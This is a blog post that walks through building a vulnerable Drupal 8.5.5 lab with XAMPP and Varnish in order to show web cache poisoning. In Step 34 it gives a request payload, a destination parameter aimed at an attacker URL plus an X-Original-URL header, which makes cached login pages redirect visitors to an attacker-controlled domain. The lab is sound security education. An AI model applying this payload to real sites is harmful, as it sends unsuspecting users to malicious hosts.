Drupal 8 Web Cache Poisoning - Vulnerability Analysis

Last updated on Dec 18, 2022 4 min read

In this blog, I have mentioned all the steps how to create vulnerable lab of Drupal 8 web cache poisoning, How it’s vulnerable to internal and external cache poisoning.

Step 1: Download the supported version of xampp.

https://sourceforge.net/projects/xampp/files/XAMPP%20Linux/7.2.34/

Step 2: To install xampp, run the following command and follow the instructions on the installer and complete the installation using default installer options.

chmod +x xampp-linux-x64-7.2.34-2-installer.run
sudo ./xampp-linux-x64-7.2.34-2-installer.run

Step 3: Start all service.

Step 4: Navigate to “localhost/phpmyadmin” in browser and click on “New” link to create new database for drupal instance.

Step 5: configure the password for database (It’s not mandatory but I always recommend to set strong password to database without leaving it empty).

Step 6: Set the password in phpmyadmin configuration file.

  • sudo gedit /opt/lampp/phpmyadmin/config.inc.php
  • In $cfg[‘Servers’][$i][‘password’]

Step 7: Download the vulnerable version of drupal 8.

wget https://ftp.drupal.org/files/projects/drupal-8.5.5.zip

Step 8: Add Source of drupal 8 in xampp htdocs directory.

sudo unzip drupal-8.5.5.zip -d /opt/lampp/htdocs

Step 9: Navigate to http://localhost/drupal-8.5.5 which will redirect to http://localhost/drupal-8.5.5/core/install.php for installation.

Step 10: Select an installation profile, choose standard and click on “Save and Continue” button.

Step 11: Due to the permission drupal installation directory, it will shows an error message as shown below.

Step 12: Set the permissions to complete the installation of drupal.

cd /opt/lampp/htdocs/drupal-8.5.5
sudo mkdir sites/default/files
sudo chmod 777 sites/default/files/
sudo cp sites/default/default.settings.php sites/default/settings.php
sudo chmod 777 sites/default/settings.php

Step 13: Refresh the page in Step 11 and go bottom of the page and click on “continue anyway” link as shown below:

Step 14: Provide the database name created for drupal and MySQL credential.

Step 15: Observe the installation is in progress.

Step 16: Configure the settings for drupal and it suggest to reset the permission.

Step 17: Once done it’s successfully login to the drupal instance and it suggest to reset the permission.

Step 18: Reset the permission using following commands.

sudo chmod 755 /opt/lampp/htdocs/drupal-8.5.5/sites/default/ -R
sudo chmod 755 /opt/lampp/htdocs/drupal-8.5.5/sites/default/settings.php
sudo chmod 755 sites/default/ -R
sudo chmod 755 sites/default/settings.php

Step 19: Configure the internal drupal cache by navigating to the URL and select the below settings.

http://localhost/drupal-8.5.5/admin/config/development/performance

Note: If the page give 404 then check this settings: Reference

sudo nano /etc/apache2/apache2.conf

<Directory /var/www/html/>
	AllowOverride All
</Directory>

sudo a2enmod rewrite

Step 20: To configure varnish external cache for drupal we have to install drupal modules.

  • Install purge_purger_http
wget https://ftp.drupal.org/files/projects/purge_purger_http-8.x-1.0-beta4.zip
sudo unzip purge_purger_http-8.x-1.0-beta4.zip -d /opt/lampp/htdocs/drupal-8.5.5/core/modules/

Step 21: Install purge.

wget https://ftp.drupal.org/files/projects/purge-8.x-3.0-beta5.zip
sudo unzip purge-8.x-3.0-beta5.zip -d /opt/lampp/htdocs/drupal-8.5.5/core/modules

Step 22: Navigate to following URL http://localhost/drupal-8.5.5/admin/modules and install following modules.

Step 23: successfully installed all the required modules.

Step 24: Navigate to the http://localhost/drupal-8.5.5/admin/config/development/performance/purge and click on “Add purger” button..

Step 25: Click on “HTTP Purger” radio box and click on “Add” button.

Step 26: From the drop-down select “Configure” option.

Step 27: Provide the required information and clicks on “Save configuration” button.

Step 28: Navigate to “Headers” and prvoide the following header information and clicks on “Save configuration” button.

Header: Purge-Cache-Tags
Value: [invalidation:expression]

Step 29: Install and configure varnish.

sudo apt-get update && sudo apt-get install varnish
sudo cp /lib/systemd/system/varnish.service /etc/systemd/system/

Step 30: configure the varnish port 80 in the configuration file.

sudo gedit /etc/systemd/system/varnish.service
sudo systemctl daemon-reload

Step 31: Change the apache port from 80 to 8080.

sudo gedit /opt/lampp/etc/httpd.conf

Note: Map this port here /etc/varnish/default.vcl

Step 32: Map the port.

sudo gedit /opt/lampp/lampp

Step 33: reload every thing.

sudo /opt/lampp/lampp restart
sudo service varnish restart

Step 34: Capture one of the get request and add the following parameter.

//?destination=https://attackerurl\@websiteurl.com
X-Original-URL: //?caching=123

Step 35: Create the following cache entry in external varnish cache and internal drupal 8 cache.

sudo varnishncsa -F '%U%q %{Varnish:hitmiss}x'

http://localhost/phpmyadmin/sql.php?server=1&db=drupal&table=cache_page&pos=0

Step 36: Update the url of Step 34 to “/drupal-8.5.5/user/login”.

Step 37: Observe the the varnish creates the new entry for “/drupal-8.5.5/user/login”, but when it sends to internal cache it responds with the content of cached URL “//?caching=123:html”.

Step 38: Now, if any user try to access “/drupal-8.5.5/user/login”, it will redirected to attacker controlled domain.

Step 39: Final cached entries when any user tried to access “/drupal-8.5.5/user/login”.

Avatar
Sanjay Gondaliya
Technical Director

My research interests include automation in pentration testing.